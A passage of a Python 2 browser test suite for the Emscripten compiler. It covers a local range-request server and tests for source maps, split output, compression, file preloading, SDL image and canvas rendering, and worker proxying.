s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
expectedConns = 11
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1']) # is the default anyhow
def test_html_source_map(self):
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print '''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
def test_emscripten_log(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_split(self):
def nfc():
# test HTML generation.
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
nonfastcomp(nfc)
def test_split_in_source_filenames(self):
def nfc():
self.reftest(path_from_root('tests', 'htmltest.png'))
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something', 'hello_world_sdl.cpp.js')), 'must be functions js file'
assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
nonfastcomp(nfc)
def test_compression(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'page.js')), 'must be side js'
assert os.path.exists(os.path.join(self.get_dir(), 'page.js.compress')), 'must be side compressed js'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size > os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be smaller'
shutil.move(os.path.join(self.get_dir(), 'page.js'), 'page.js.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print 'make main at', path
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print 'Testing', srcpath, dstpath
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT();
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_compressed_file(self):
open(os.path.join(self.get_dir(), 'datafile.txt'), 'w').write('compress this please' + (2000*'.'))
open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w').write('moar' + (100*'!'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.build_native_lzma()
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html',
'--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')
]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound');
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 1000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt'], manual_reference=True, post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod):
open(to + '.html', 'w').write(open('test.html').read().replace('test.js', to + '.js'))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: original.replace('function _main($argc,$argv) {', 'function _main($argc,$argv) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); }'))
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: original.replace('function _main($argc,$argv) {', 'function _main($argc,$argv) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); }'))
self.run_browser('three.html', None, ['/report_result?999'])
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1']).communicate()
open('test.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('{{{ SCRIPT }}}', '<script src="test.js"></script>'))
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', reference='sdl_canvas_alpha.png', reference_slack=11)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=11)
def test_sdl_key(self):
